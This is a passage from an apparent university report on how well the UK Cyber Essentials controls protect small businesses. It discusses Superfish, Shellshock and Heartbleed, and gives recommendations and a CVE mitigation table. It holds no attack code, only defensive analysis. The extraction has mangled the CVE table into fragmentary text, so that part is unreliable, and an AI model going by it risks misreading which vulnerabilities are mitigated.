The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
